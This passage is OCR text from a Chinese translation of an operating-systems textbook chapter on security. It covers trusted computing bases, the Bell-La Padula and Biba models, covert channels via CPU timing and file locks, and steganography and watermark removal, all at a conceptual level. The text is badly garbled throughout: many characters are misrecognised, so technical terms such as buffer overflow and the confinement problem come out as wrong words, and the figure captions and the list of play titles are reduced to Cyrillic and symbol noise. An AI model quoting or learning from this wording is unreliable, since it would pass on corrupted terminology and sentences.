除 时 权能 字 未 被 制 除 ， 或 者 权能 字 被 删除 时 对 象 未 被 制 除 ， 问 是 就 会 发 生 。 而 ACL 不 会 产生 这 样 的 问题 。 


9.3.4 可 信 系 统 

人 们 总 是 可 以 从 各 种 渠道 中 获得 关于 病毒 、 蠕 虫 以 及 其 他 相关 的 消息 。 天 真 的 人 可 能 会 问 下 面 两 个 
问题 : 

1 建立 一 个 安全 的 操作 系统 有 可 能 吗 ? 

2) 如 果 可 能 ， 为 什么 不 去 做 昵 ? 

第 一 个 问题 的 答案 原则 上 是 肯定 的 。 如 何 建立 安全 系统 的 答案 人 们 数 十 年 前 就 知道 了 。 例 如 ， 在 20 
世纪 60 年 代 设计 的 MULTICS 就 把 安全 作为 主要 目标 之 一 而 且 做 得 非常 好 。 

为 什么 不 建立 一 个 安全 系统 是 一 个 更 为 复杂 的 问题 ， 主 要 原因 有 两 个 。 首 先 ， 现 代 系统 虽然 不 安全 
但 是 用 户 不 愿 抛弃 它们 。 假 设 Microsoft 宣 布 除了 Windows 外 还 有 一 个 新 的 SecureOS 产 品 ， 并 保证 不 会 受 
到 病毒 感染 但 不 能 运行 Windows 应 用 程序 ， 那 么 很 少 会 有 用 户 和 公司 把 Windows 像 个 痪 手 山芋 一 样 扔 挤 
转 而 立即 购买 新 的 系统 。 事 实 上 Microsoft 的 确 有 一 款 SecureOS (Fandrich 等 人 , 2006), ， 但 是 并 没有 投入 
商业 市 场 。 

第 二 个 原因 更 敏感 。 现 在 已 知 的 建立 安全 系统 仅 有 的 办 法 是 保持 系统 的 简单 性 。 特 性 是 安全 的 大 敌 。 
系统 设计 师 相 信 (无 论 是 正确 还 是 错误 的 ) 用 户 所 想 要 的 是 更 多 的 特性 。 更 多 的 特性 意味 着 更 多 的 复杂 
性 ,更 多 的 代码 以 及 更 多 的 安全 性 错误 。 
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这 里 有 两 个 简单 的 例子 。 最 早 的 电子 邮件 系统 通过 ACSII 文 本 发 送 消息 。 它 们 是 完全 安全 的 。 
ASCII 文 本 不 可 能 对 计算 机 系统 造成 损失 。 然 后 人 们 想方设法 扩展 电子 邮件 的 功能 ， 引 入 了 其 他 类 型 的 
文档 ， 如 可 以 包含 宏 程 序 的 Word 文 件 。 读 这 样 的 文件 意味 着 在 自己 的 计算 机 上 运行 别人 的 程序 。 无 论 沙 
盒 怎么 有 效 ， 在 自己 的 计算 机 上 运行 别人 的 程序 必定 比 ASCII 文 本 要 危险 得 多 。 是 用 户 要 求 从 过 去 的 文 
本 格式 改 为 现在 的 活动 程序 吗 ?大概 不 是 吧 ， 但 系统 设计 人 员 认 为 这 是 个 极 好 的 主意 ， 而 没有 考虑 到 隐 
含 的 安全 问题 。 

第 二 个 例子 是 关于 网 页 的 。 过 去 的 HTML 网 页 没有 造成 大 的 安全 问题 (虽然 非法 网 页 也 可 能 导致 组 
冲 溢出 攻击 )。 现 在 许多 网 页 都 包含 了 可 执行 程序 (Applet) ， 用 户 不 得 不 运行 这 些 程序 来 浏览 网 页 内 容 ， 
结果 一 个 又 一 个 安全 漏洞 出 现 了 。 即 便 一 个 漏洞 被 补 上 ， 又 会 有 新 的 漏洞 显现 出 来 。 当 网 页 完全 是 静态 
的 时 候 ， 是 用 户 要 求 增加 动态 内 容 的 吗 ? 可 能 动态 网 页 的 设计 者 也 记 不 得 了 ， 但 随 之 而 来 是 大 量 的 安全 
问题 。 这 有 点 像 负责 说 “不 ”的 副 总 统 在 车 轮 下 睡 着 了 。 

实际 上 ， 确 实 有 些 组 织 认为 ， 与 非常 漂亮 的 新 功能 相 比 ， 好 的 安全 性 更 为 重要 。 军 方 组 织 就 是 一 个 
重要 的 例子 。 在 接 下 来 的 几 节 中 ， 我们 将 研究 相关 的 一 些 问题 ， 不 过 这 些 问题 不 是 几 名 话 便 能 说 清楚 的 。 
要 构建 一 个 安全 的 系统 ， 需 要 在 操作 系统 的 核心 中 实现 安全 模型 ， 且 该 模型 要 非常 简单 ， 从 而 设计 人 员 
确实 能 够 理解 模型 的 内 涵 ， 并 和 且 顶 住所 有 压力 ， 避 免 偏离 安全 模型 的 要 求 去 添加 新 的 功能 特性 。 


9.3.5 可 信 计 算 基 

在 安全 领域 中 ， 人 们 通常 讨论 可 信 系 统 而 不 是 安全 系统 。 这 些 系统 在 形式 上 申明 了 安全 要 求 并 满足 
了 这 些 安全 要 求 。 每 一 个 可 信 系统 的 核心 是 最 小 的 可 信 计 算 基 (Trusted Computing Base，TCB)， 其 中 
包含 了 实施 的 所 有 安全 规则 所 必需 的 硬件 和 软件 。 如 果 这 些 可 信 计 算 基 根 据 系 统 规约 工作 ， 那 么 ， 无 论 
发 生 了 什么 错误 ， 系 统 安全 性 都 不 会 受到 威胁 。 

典型 的 TCB 包 括 了 大 多 数 的 硬件 (除了 不 影响 安全 性 的 1/O 设 备 )、 操 作 系 统 核心 的 一 部 分 、 大 多 数 
或 所 有 掌握 超级 用 户 权限 的 用 户 程序 (如 在 UNIX 中 的 SETUID 根 程序 ) 。 必 须 包 含 在 操作 系统 中 的 TCB 
功能 有 : 进程 创建 、 进 程 切换 、 内 存 页 面 管理 以 及 部 分 的 文件 以 及 IO 管理 。 在 安全 设计 中 ， 为 了 减少 
空间 以 及 纠正 错误 ，TCB 通 常 完全 独立 于 操作 系统 的 其 他 部 分 。 

TCB 中 的 一 个 重要 组 成 部 分 是 引用 监视 器 ， 如 图 9-11 所 示 。 引 用 监视 器 接受 所 有 与 安全 有 关 的 系统 
请 求 (如 打开 文件 等 )， 然 后 决定 是 否 允 许 运 行 。 引 用 监视 器 要 求 所 有 的 安全 问题 决策 都 必须 在 同一 处 
考虑 ， 而 不 能 跳 过 。 大 多 数 的 操作 系统 并 不 是 这 样 设计 的 ， 这 也 是 它们 导致 不 安全 的 部 分 原因 。 


| 


7 用户 空 间 


内 核 空间 


图 9-11 引用 监视 器 


现今 安全 研究 的 一 个 目标 是 将 可 信 计 算 基 中 数 百 万 行 的 代码 缩短 为 只 有 数 万 行 代码 。 在 图 1-26 中 我 
们 看 到 了 MINIX 3 操作 系统 的 结构 。MINIX 3 是 具有 POSIX 莱 容 性 的 系统 ， 但 又 与 Linux 或 FreeBSD 有 着 
完全 不 同 的 结构 。 在 MINIX 3 中 ， 只 有 4000 行 左右 的 代码 在 内 核 中 运行 。 其 余部 分 作为 用 户 进程 运行 。 
其 中 ， 如 文件 系统 和 进程 管理 器 是 可 信 基 的 一 部 分 ， 因 为 它们 与 系统 安全 息息相关 ， 但 是 诸如 打印 机 了 驱 
动 和 音频 驱动 这 样 的 程序 并 不 作为 可 信 计 算 库 的 一 部 分 ， 因 为 不 管 这 些 程序 出 了 什么 问题 ， 它 们 的 行为 
也 不 可 能 危及 系统 安全 。MINIX 3 将 可 信 计 算 库 的 代码 量 减少 了 两 个 数量 级 ， 从 而 潜在 地 比 传统 系统 设 
计 提 供 了 更 高 的 安全 性 。 
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9.3.6 安全 系统 的 形式 化 模型 

诸如 图 9-5 的 保护 矩阵 并 不 是 静态 的 。 它 们 通常 随 着 创建 新 的 对 象 ， 销 毁 旧 的 对 象 而 改变 ， 而 且 所 
有 者 决定 对 象 的 用 户 集 的 增加 或 限制 。 人 们 把 大 量 的 精力 花费 在 建立 安全 系统 模型 ， 这 种 模型 中 的 保护 
夭 阵 处 于 不 断 的 变化 之 中 。 在 本 节 的 稍 后 部 分 ， 我 们 将 简单 介绍 这 方面 的 工作 原理 。 

几 十 年 前 ，Harrison 等 人 (1976) 在 保护 矩阵 上 确定 了 6 种 最 基本 的 操作 ， 这 些 操作 可 用 于 任何 安 
全 系统 模型 的 基准 。 这 些 最 基本 的 操作 是 create object, delete object, create domain, delete 
domain, insert right 和 remove right。 最 后 的 两 种 插入 和 删除 权限 操作 来 自 于 特定 的 矩阵 单元 ， 如 赋予 
域 1 读 文件 6 的 许可 权 。 

上 述 6 种 操作 可 以 合并 为 保护 命令 。 用 户 程序 可 以 运行 这 些 命令 来 改变 保护 矩阵 。 它 们 不 可 以 直接 
执行 最 原始 的 操作 。 例 如 ， 系 统 可 能 有 一 个 创建 新 文件 的 命令 ， 该 命令 首先 查看 该 文件 是 否 已 存在 ， 如 
果 不 存在 就 创建 新 的 对 象 并 赋予 所 有 者 相应 的 权限 。 当 然 也 可 能 有 一 个 命令 允许 所 有 者 赋予 系统 中 所 有 
用 户 读 取 该 文件 的 权限 。 实 际 上 ， 只 要 把 “ 读 ”权限 插入 到 每 个 域 中 该 文件 的 登录 项 即 可 。 

此 刻 ， 保 护 矩 阵 决定 了 在 任何 域 中 的 一 个 进程 可 以 执行 哪些 操作 ， 而 不 是 被 授权 执行 哪些 操作 。 矩 
阵 是 由 系统 来 强制 的 ， 而 授权 与 管理 策略 有 关 。 为 了 说 明 其 差别 ， 我 们 看 一 看 图 9-12 域 与 用 户 相对 应 的 
例子 。 在 图 9-12a 中 ， 我 们 看 到 了 既定 的 保护 策略 : Henry 可 以 读 写 mailbox7，Robert 可 以 读 写 secret， 所 
有 的 用 户 可 以 读 和 运行 compiler。 


图 9-12 а) 授权 后 的 状态 ，b) 未 授权 的 状态 


现在 假设 Robert 非 常 聪 明 ， 并 找到 了 一 种 方法 发 出 命令 把 保护 矩阵 改 为 如 图 9-12b 所 示 。 现 在 他 就 
可 以 访问 mailbox7 了 ， 这 是 他 本 来 未 被 授权 的 。 如 果 他 想 读 文 件 ， 操 作 系 统 就 可 以 执行 他 的 请 求 ， 因 为 
操作 系统 并 不 知道 图 9-12b 的 状态 是 未 被 授权 的 。 

很 明显 , 所 有 可 能 的 矩阵 被 划分 为 两 个 独立 的 集合 : 所 有 处 于 授权 状态 的 集合 和 所 有 未 授权 的 集合 。 
经 过 大 量 理论 上 的 研究 后 会 有 这 样 一 个 问题 : 给 定 一 个 最 原始 的 授权 状态 和 命令 集 ， 是 否 能 证 明 系 统 永 
远 不 能 达到 未 授权 的 状态 ? 

实际 上 ， 我 们 是 在 询问 可 行 的 安全 机 制 (保护 命令 ) 是 否 足以 强制 某 些 安全 策略 。 给 定 了 这 些 安全 
策略 、 最 初 的 矩阵 状态 和 改变 这 些 矩 阵 的 命令 集 ， 我 们 希望 可 以 找到 建立 安全 系统 的 方法 。 这 样 的 证 明 
过 程 是 非常 困难 的 : 许多 一 般 用 途 的 系统 在 理论 上 是 不 安全 的 。Harrison 等 人 (1976) 曾经 证 明 在 一 个 
不 定 的 保护 系统 的 不 定 配置 中 ， 其 安全 性 从 理论 上 来 说 是 不 确定 的 。 但 是 对 特定 系统 来 说 ， 有 可 能 证 明 
系统 可 以 从 授权 状态 转移 到 未 授权 状态 。 要 获得 更 多 的 信息 请 看 Landwehr (1981), 
9.3.7 多 级 安全 

大 多 数 操作 系统 允许 个 人 用 户 来 决定 谁 可 以 读 写 他 们 的 文件 和 其 他 对 象 。 这 一 策略 称 为 可 自由 支配 
的 访问 控制 discretionary access control) 。 在 许多 环境 下 ， 这 种 模式 工作 很 稳定 ， 但 也 有 些 环境 需要 更 
高 级 的 安全 ， 如 军 方 、 企 业 专利 部 门 和 医院 。 在 这 类 环境 里 ， 机 构 定义 了 有 关 谁 可 以 看 什么 的 规则 ， 这 
些 规则 是 不 能 被 士兵 、 律 师 或 医生 改变 的 ， 至 少 没有 老板 的 许可 是 不 允许 的 。 这 类 环境 需要 强制 性 的 访 
问 榨 制 (mandatory access control) 来 确保 所 阐明 的 安全 策略 被 系统 强制 执行 ， 而 不 是 可 自由 支配 的 访 
问 控制 。 这 些 强制 性 的 访问 控制 管理 整个 信息 流 ， 确 保 不 会 泄漏 那些 不 应 该 泄漏 的 信息 。 

1. Bell-La Padula 模 型 

最 广泛 使 用 的 多 级 安全 模型 是 Bell-La Padula 模 型 ， 我 们 将 看 看 它 是 如 何 工作 的 (Bell La 和 Padula, 
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1973)。 这 一 模型 最 初 为 管理 军 方 安全 系统 而 设计 ， 现 在 被 广泛 运用 于 其 他 机 构 。 在 军 方 领域 ,文档 (对 
Ж) 有 一 定 的 安全 等 级 ， 如 内 部 级 、 秘 密级 、 机 密级 和 绝密 级 。 每 个 人 根据 他 可 阅读 文档 的 不 同 也 被 指 
定 为 不 同 的 密级 。 如 将 军 可 能 有 权 阅 取 所 有 的 文档 ， 而 中 尉 可 能 只 被 限制 在 秘密 级 或 更 低 的 文档 。 代 表 
用 户 运行 的 进程 具有 该 用 户 的 安全 密级 。 由 于 该 系统 拥有 多 个 安全 等 级 ， 所 以 被 称 为 多 级 安全 系统 。 

Bell-La Padula 模 型 对 信息 流 做 出 了 一 些 规定 : 

D 简易 安全 规则 ， 在 密级 k 上 面 运 行 的 进程 只 能 读 同一 密级 或 更 低 密级 的 对 象 。 例 如 ， 将 军 可 以 阅 
取 中 尉 的 文档 ， 但 中 慰 却 不 可 以 阅 取 将 军 的 文档 。 

2) * 规 划 ， 在 密级 k 上 面 运行 的 进程 只 能 写 同一 密级 或 更 高 密级 的 对 象 。 例 如 ， 中 尉 只 能 在 将 军 的 信 
箱 添加 信息 告知 自己 所 知 的 全 部 ， 但 是 将 军 不 能 在 中 尉 的 信箱 里 添加 信息 告知 自己 所 知 的 全 部 ， 因 为 将 
军 拥 有 绝密 的 文档 ， 这 些 文档 不 能 泄露 给 中 尉 。 

简 而 言 之 ， 进 程 既 可 下 读 也 可 上 写 ， 但 不 能 颠倒 。 如 果 系 统 严格 地 执行 上 述 两 条 规则 ， 那 么 就 不 会 有 
信息 从 高 一 级 的 安全 层 泄露 到 低 一 级 的 安全 层 。 之 所 以 用 * 代表 这 种 规则 是 因为 在 最 初 的 论文 里 ， 作 者 没有 
想 出 更 好 的 名 字 所 以 只 能 用 * 作为 临时 的 赫 代 。 但 是 最 终 作者 没有 想 出 更 好 的 名 字 ， 所 以 在 打印 论文 时 用 
了 *。 在 这 一 模型 中 ， 进 程 可 以 读 写 对象 ， 但 不 能 直接 相互 通信 。 Bell-La Padula 模 型 的 图 解 如 图 9-13 所 示 。 
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图 9-13 Bell-La Padula 多 层 安全 模型 


在 图 中 ， 从 对 象 到 进程 的 ( 实 线 ) 箭头 代 该 进程 正在 读 取 对 象 ， 也 就 是 说 ， 信息 从 对 象 流向 进程 。 
同样 ， 从 进程 到 对 象 的 (虚线 ) 箭头 代表 进程 正在 写 对 象 ， 也 就 是 说 ， 信息 从 进程 流向 对 象 。 这 样 所 有 
的 信息 流 都 沿 着 箭头 方向 流动 。 例 如 ， 进程 B 可 以 从 对 象 1 读 取信 息 但 却 不 可 以 从 对 象 3 读 取 。 

简单 安全 模型 显示 ， 所 有 的 实 线 ( 读 ) 箭头 横向 运动 或 向 上 ; * 规则 显示 所 有 的 虚线 箭头 〈( 写 ) 也 
横向 运行 或 向 上 。 既 流 要 么 水 平 ， 要 么 季 直 ， 那 么 任何 从 k 野 开始 的 信息 都 不 可 能 出 现在 更 低 的 
级 别 。 也 就 是 说 ， 没 有 路 径 可 以 让 信息 往 下 运行 ， 这 样 就 保证 了 模型 的 安全 性 。 

Bell-La Padula 模 型 涉及 组 织 结构 ， 但 最 终 还 是 需要 操作 系统 来 强制 执行 。 实现 上 述 模型 的 一 种 方 
式 是 为 每 个 用 户 分 配 一 个 安全 级 别 ， 该 安全 级 别 与 用 户 的 认证 信息 (如 UID 和 GID) 一 起 存储 。 在 用 户 
登陆 的 时 候 ，shell 获 取 用 户 的 安全 级 别 ， 且 该 安全 级 别 会 被 shell 创 建 的 所 有 子 进程 继承 下 去 。 如 果 一 个 
运行 在 安全 级 别 之 下 的 进程 试图 访问 一 个 安全 级 别 比 4 高 的 文件 或 对 象 ， 操作 系统 将 会 拒绝 这 个 请 求 。 
相似 地 ， 任 何 试图 对 安全 级 别 低 于 k 的 对 象 执行 写 操作 的 请 求 也 一 定 会 失败 。 . 

2. Biba 模 型 

为 了 总 结 用 军 方术 语 表示 的 Bell-La Padula 模 型 ， 一 个 中 尉 可 以 让 -个 士兵 把 自己 所 知道 的 所 有 信 
息 复制 到 将 军 的 文件 里 而 不 妨碍 安全 。 现在 让 我 们 把 同样 的 模型 放 在 民用 领域 。 设 想 一 家 公司 的 看 门人 
拥有 等 级 为 1 的 安全 性 ， 程 序 员 拥有 等 级 为 3 的 安全 性 ， 总 裁 拥有 等 级 为 5 的 安全 性 。 使 用 Bell-La Padula 
模型 ， 程 序 员 可 以 向 看 门人 询问 公司 的 发 展 规划 ， 然后 覆 写 总 裁 的 有 关 企 业 策略 的 文件 。 但 并 不 是 所 有 
的 公司 都 热衷 于 这 样 的 模型 。 

Bell-La Padula 模 型 的 问题 在 于 它 可 以 用 来 保守 机 密 ， 但 不 能 保证 数据 的 完整 性 。 要 保证 数据 的 完 
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整 性 ， 我 们 需要 更 精确 的 逆向 特性 (Biba, 1977). 
1) 简单 完整 性 原理 : 在 安全 等 级 上 上 运行 的 进程 只 能 写 同一 等 级 或 更 低 等 级 的 对 象 (没有 往 上 写 )。 
2) 完整 性 * 规则 : 在 安全 等 级 [上 运行 的 进程 只 能 读 同 一 等 级 或 更 高 等 级 的 对 象 (不 能 向 下 读 ) 。 
这 些 特性 联合 在 一 起 确保 了 程序 员 可 以 根据 公司 总 裁 的 要 求 更 新 看 门人 的 信息 ， 但 反 过 来 不 可 以 。 
当然 ， 有 些 机 构想 同时 拥有 Bell-La Padula 和 Biba 特 性 ， 但 它们 之 间 是 矛盾 的 ， 所 以 很 难 同时 满足 。 


9.3.8 隐蔽 信道 
所 有 的 关于 形式 模型 和 可 证 明 的 安全 系统 听 上 去 都 十 分 有 效 ， 但 是 它们 能 否 真正 工作 ?简单 说 来 是 
不 可 能 的 。 甚 至 在 提供 了 合适 安全 模型 并 可 以 证 明 实现 方法 完全 正确 的 系统 里 ， 仍 然 有 可 能 发 生 安全 汇 
露 。 本 节 将 讨论 已 经 严格 证 明 在 数学 上 泄露 是 不 可 能 的 系统 中 ， 信 息 是 如 何 泄露 的 。 这 些 观点 要 归功 于 
Lampson (1973), 
Lampson 的 模型 最 初 是 通过 单一 分 时 系统 病 述 的 ， 但 在 LAN 和 其 他 一 些 多 用 户 系统 中 也 采用 了 该 模 
型 。 该 模型 最 简单 的 方式 是 包含 了 三 个 运行 在 保护 机 器 上 的 进程 。 第 一 个 进程 是 客户 机 进程 ， 它 让 某 些 
工作 通过 第 二 个 进程 也 就 是 服务 器 进程 来 完成 。 客 户 机 进程 和 服务 器 进程 不 完全 相互 信任 。 例 如 ， 服 务 
器 的 工作 是 帮助 客户 机 来 填写 税 单 。 客 户 机 会 担心 服务 器 秘密 地 记录 下 它们 的 财务 数据 ， 例 如 ， 列 出 谁 
赚 了 多 少 钱 的 秘密 清单 ， 然 后 转手 倒卖 。 服 务 器 会 担心 客户 机 试图 窃取 有 价值 的 税务 软件 。 
第 三 个 进程 是 协作 程序 ， 该 协作 程序 正在 同 服务 器 合作 来 窃取 客户 机 的 机 密 数据 。 协 作 程序 和 服务 
器 显然 是 由 同一 个 人 掌握 的 。 这 三 个 进程 如 图 9-14 所 示 。 这 一 例子 的 目标 是 设计 出 一 种 系统 ， 在 该 系统 
内 服务 器 进程 不 能 把 从 客户 机 进程 合法 获得 的 信息 泄 吕 给 协作 进程 。Lampson 把 这 一 问题 叫做 春 限 问题 
(confinement problem), 
从 系统 设计 人 员 的 观点 来 说 ， 设 计 目 标 是 采取 某 种 方法 封闭 或 限制 服务 器 ， 使 它 不 能 向 协作 程序 伟 
递 信息 。 使 用 保护 矩阵 架构 可 以 较为 容易 地 保证 服务 器 不 会 通过 进程 间 通信 的 机 制 写 一 个 使 得 协作 程序 
可 以 进行 读 访 问 的 文件 。 我 们 已 可 以 保证 服务 器 不 能 通过 系统 的 进程 间 通 信 机 制 来 与 协作 程序 通信 。 
进 居 的 是 ， 系 统 中 仍 存 在 更 为 精巧 的 通信 信道。 例如 ， 服 务 器 可 以 尝试 如 下 的 二 进 制 位 流 来 通信 ， 
要 发 送 ! 时 ， 进 程 在 固定 的 时 间 段 内 章 尽 所 能 执行 计算 操作 ， 要 发 送 0 时 ， 进 程 在 同样 长 的 时 间 段 内 睡眠 。 
re ЫШ 封装 后 的 服务 器 
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图 9-14 а) 客户 机 进程 、 服 务 器 进程 和 协作 程序 进程 ，b) 封装 后 的 服务 器 
可 以 通过 隐蔽 信道 向 协作 程序 进程 泄露 信息 

协作 程序 能 够 通过 仔细 地 监控 响应 时 间 来 检测 位 流 。 一 般 而 言 ， 当 服务 器 送出 0 时 的 响应 比 送出 1 时 
的 响应 要 好 一 些 。 这 种 通信 方式 叫做 隐蔽 信道 (covert channel) ， 如 图 9-14b 所 示 。 

当然 ， 隐 项 信道 同时 也 是 哮 杂 的 信道 ， 包 含 了 大 量 的 外 来 信息 。 但 是 通过 纠 错 码 (如 汉 明 码 或 者 更 复 
杂 的 代码 ) 可 以 在 这 样 嘲 杂 的 信道 中 可 靠 地 传递 信息 。 纠 错 码 的 使 用 使 得 带宽 已 经 很 低 的 隐蔽 信道 变 得 更 
窗 ， 但 仍 有 可 能 泄 占 真实 的 信息 。 很 明显 ， 没 有 一 种 基于 对 象 矩 阵 和 域 的 保护 模式 可 以 防止 这 种 泄露。 

调节 CPU 的 使 用 率 不 是 惟一 的 隐蔽 信道 , 还 可 以 调制 页 率 (多 个 页 面 错误 表示 1, 没有 页 面 错误 表示 0)。 
实际 上 ， 在 一 个 计时 方式 里 ， 几 乎 任何 可 以 降低 系统 性 能 的 途径 都 可 能 是 隐蔽 信道 的 候选 。 如 果 系统 提供 
了 一 种 锁定 文件 的 方法 ， 那 么 系统 就 可 以 把 锁定 文件 表示 为 1， 解 锁 文 件 表示 为 0。 在 某 些 系统 里 ， 进 程 也 
可 能 检测 到 文件 处 于 不 能 访问 的 锁定 状态 。 这 一 隐蔽 信道 如 图 9-15 所 示 ， 图 中 对 服务 器 和 协作 程序 而 言 ， 
在 某 个 固定 时 间 内 文件 的 锁定 或 未 锁定 都 是 已 知 的 。 在 这 一 实例 中 ， 在 传送 的 秘密 位 流 是 11010100。 
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锁定 或 解锁 一 个 预 置 的 文件 ， 且 S 不 是 在 一 个 特别 哮 杂 的 信道 里 ， 并 不 需要 十 分 精确 的 时 序 ， 除 非 
比特 率 很 慢 。 使 用 一 个 双方 确认 的 通信 协议 可 以 增强 系统 的 可 靠 性 和 性 能 。 这 种 协议 使 用 了 2 个 文件 F1 
和 F2。 这 两 个 文件 分 别 被 服务 器 和 协作 程序 锁定 以 保持 两 个 进程 的 同步 。 当 服务 器 锁定 或 解锁 S 后 ， 它 
将 FI 的 状态 反 置 表示 送出 了 一 个 比特 。 一 旦 协作 程序 读 取 了 该 比特 ， 它 将 F2 的 状态 反 置 告知 服务 器 可 以 
送出 下 一 个 比特 了 ， 直 到 F1 被 再 次 反 置 表示 在 S 中 第 二 个 比特 已 送 达 。 由 于 这 里 没有 使 用 时 序 技术 ， 所 
以 这 种 协议 是 完全 可 靠 的 , 并 且 可 以 在 繁忙 的 系统 内 使 它们 得 以 按 计划 快速 地 传递 信息 。 也 许 有 人 会 问 : 
要 得 到 更 高 的 带宽 ， 为 什么 不 在 每 个 比特 的 传输 中 都 使 用 文件 呢 ? 或 者 建立 一 个 字 节 宽 的 信道 ， 使 用 从 
S0 到 S7 共 8 个 信号 文件 ? 


л. 


кел 文件 发 送 0 


1 ' о o 1 ° 0 一 发 送出 去 的 位 流 


me -O 0000000 


时 间 一 
图 9-15 使 用 文件 加 锁 的 隐藏 信道 


获取 和 释放 特定 的 资源 (磁带 机 、 绘 图 仪 等 ) 也 可 以 用 来 作为 信号 方式 。 服 务 器 进程 获取 资源 时 表 
示 发 送 1 信号 ， 释 放 资 源 时 表示 发 送 0 信 号 。 在 UNIX 里 ， 服 务 器 进程 创建 文件 表示 1， 删 除 文件 表示 0 
协作 程序 可 以 通过 系统 访问 请 求 来 查看 文件 是 否 存在 。 即 使 协作 程序 没有 使 用 文件 的 权限 也 可 以 通过 系 
统 访问 请 求 来 查看 。 然 而 很 不 幸 ， 仍 然 还 存在 许多 其 他 的 隐藏 信道 。 

Lampson 也 提 到 了 把 信息 泄露 给 服务 器 进程 所 有 者 (人 ) 的 方法 。 服 务 器 进程 可 能 有 资格 告诉 其 所 
有 者 ， 它 已 经 替 客 户 机 完成 了 多 少 工作 ， 这 样 可 以 要 求 客户 机 付 账 。 如 ， 假 设 真正 的 计算 值 为 100 美 元 ， 
而 客户 收入 是 53 000 美 元 ， 那 么 服务 器 就 可 以 报告 100.53 美 元 来 道 知 自己 的 主人 。 

仅仅 找到 所 有 的 隐 项 信道 已 经 是 非常 困难 的 了 ， 更 不 用 说 阻止 它们 了 。 实 际 上 ， 没 有 什么 可 行 的 方 
法 。 引 入 一 个 可 随机 产生 页 面 调用 错误 的 进程 ， 或 为 了 减少 隐蔽 信道 的 带宽 而 花费 时 间 来 降低 系统 性 能 
等 ， 都 不 是 什么 诱 人 的 好 主意 。 

隐 写 术 

另 一 类 稍微 不 同 的 隐蔽 信道 能 够 在 进程 间 传递 机 密 信息 ， 即 使 人 为 或 自动 的 审查 监视 着 进程 间 的 所 有 信 
息 并 禁止 可 疑 的 数据 传递 。 例 如 ， 假 设 一 家 公司 人 为 地 检查 所 有 发 自 公 司职 员 的 电子 邮件 来 确保 没有 机 密 泄 
露 给 公司 外 的 竞争 对 手 或 同谋 。 雇 员 是 否 有 办 法 在 审查 者 的 鼻子 下 面 偷 带 出 机 密 的 信息 呢 ? 结果 是 可 能 的 。 

让 我 们 用 例子 来 证 明 。 请 看 图 9-16a， 这 是 一 张 在 肯尼亚 拍摄 的 照片 ， 照 片上 有 三 只 班 马 在 注视 着 
金 合欢 树 。 图 9-16b 看 上 去 和 图 9-16a 差 不 多 ， 但 是 却 包含 了 附加 的 信息 。 这 些 信息 是 完整 而 未 被 删节 的 
五 部 莎士比亚 戏剧 : CAEH), (ERED (ERAD, ОЛЕДИ Л) п Э ЛАТИ), 这些 戏 剧 总 
共 加 起 来 超过 700KB 的 文本 。 

隐蔽 信道 是 如 何 工作 的 呢 ? 原来 的 彩色 图 片 是 1024 x 768 像 素 的 。 每 个 像素 包括 三 个 8 位 数字 ， 分 别 代 
表 红 、 绿 、 蓝 三 原色 的 亮度 。 像 素 的 颜色 是 通 i 色 的 线性 重 登 形成 的 。 编 码 程序 使 用 每 个 RGB 色 度 的 
低位 作为 隐蔽 信道 。 这 样 每 个 像素 就 有 三 位 的 秘密 空间 存放 信息 ， 一 个 在 红色 色 值 里 ， 一 个 在 绿色 色 值 里 ， 
一 个 在 蓝 色色 值 里 。 这 种 情况 下 ， 图 片 大 小 将 增加 1024 x 768 x 3 位 或 294 912 个 字 节 的 空间 来 存放 信息 。 

五 部 戏剧 和 一 份 简短 说 明 加 起 来 有 734 891 个 字 节 。 这 些 内 容 首先 被 标准 的 压缩 算法 压缩 到 274KB， 
压缩 后 的 文件 加 密 后 被 插入 到 每 个 色 值 的 低位 中 。 正 如 我 们 所 看 到 的 (实际 上 看 不 到 ) ， 存 放 的 信息 完 
全 是 不 可 见 的 ， 在 放大 的 、 全 彩 的 照片 里 也 是 不 可 见 的 。 一 旦 图 片 文件 通过 了 审查 ， 接 收 者 就 剥离 低位 
数据 ， 利 用 解码 和 解压 缩 算法 还 原 出 743 891 个 字 节 。 这 种 隐藏 信息 的 方法 叫做 隐 写 术 (steganography, 
来 自 于 希腊 语 ” 隐 项 书写 " )。 隐 写 术 在 那些 试图 限制 公民 通信 自由 的 独裁 统治 国家 里 不 太 流 行 ， 但 在 那 
些 非常 有 言论 自由 的 国家 里 却 十 分 流行 。 
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b) 
图 9-16 а) 三 只 斑马 和 一 棵 树 ，b) 三 只 班 马 、 一 棵 树 以 及 五 部 莎士比亚 完整 的 戏剧 


在 低 分 辩 率 下 观看 这 两 张 黑白 照片 并 不 能 让 人 领略 隐 写 术 的 高 超 技巧 。 要 更 好 地 理解 隐 写 术 的 工作 
原理 ， 作 者 提供 了 一 个 范例 ， 它 包含 有 图 9-16b 中 的 图 像 。 这 一 范例 可 以 在 www.cs.vu.nl/~ast/ 上 找到 。 
只 要 点 击 covered writing F HLASTEGANOGRAPHY DEMO 开头 的 链接 即 可 。 页 面 上 会 指导 用 户 下 载 图 
片 和 所 需 的 隐 写 术 工 具 来 释放 戏剧 文本 。 

另 一 个 隐 写 术 的 使 用 是 把 隐藏 的 水 印 插 入 网 页 上 的 图 片 中 以 防止 窃取 者 用 在 其 他 的 网 页 上 。 如 果 你 
网 页 上 的 图 片 包含 以 下 秘密 信息 :“Copyright 2008, General Images Corporation” ， 你 就 很 难说 服 法 官 这 
是 你 自己 制作 的 图 片 。 音 乐 、 电 影 和 其 他 素材 都 可 以 通过 加 入 水 印 来 防止 窃取 。 

当然 ， 水 印 的 使 用 也 鼓励 人 们 想 办 法 去 除 它们 。 通 过 下 面 的 方法 可 以 攻击 在 像素 低位 嵌入 信息 的 技 
Ж: 首先 把 图 像 顺 时 针 转 动 1 度 ， 然 后 把 它 转 换 为 JPEG 这 样 有 损耗 的 图 片 格式 ， 再 逆 时 针 转 1 度 ， 最 后 
图 片 被 转换 为 原来 的 格式 (如 gif，bmp，tif 等 )。 有 损耗 的 JPEG 格 式 会 通过 浮 点 计算 来 混合 处 理 像素 的 
低位 ， 这 样 会 导致 四 售 五 人 的 发 生 ， 同 时 在 低位 增加 了 噪声 信息 。 不 过 ， 放 置 水 印 的 人 们 也 考虑 (或 者 
应 该 考虑 ) 到 了 这 种 情况 ， 所 以 他 们 重复 地 嵌入 水 印 并 使 用 其 他 的 一 些 方法 。 这 反 过 来 又 促使 了 攻击 者 
寻找 更 好 的 手段 去 除 水 印 。 结 果 ， 这 样 的 对 抗 周而复始 。 


9.4 认证 

每 一 个 安全 的 计算 机 系统 一 定 会 要 求 所 有 的 用 户 在 登录 的 时 候 进行 身份 认证 。 如 果 操 作 系统 无 法 确 
